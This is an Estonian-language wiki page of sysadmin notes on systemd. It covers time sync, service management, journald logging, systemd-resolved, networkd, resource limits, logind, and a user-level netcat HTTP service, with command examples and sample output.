keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
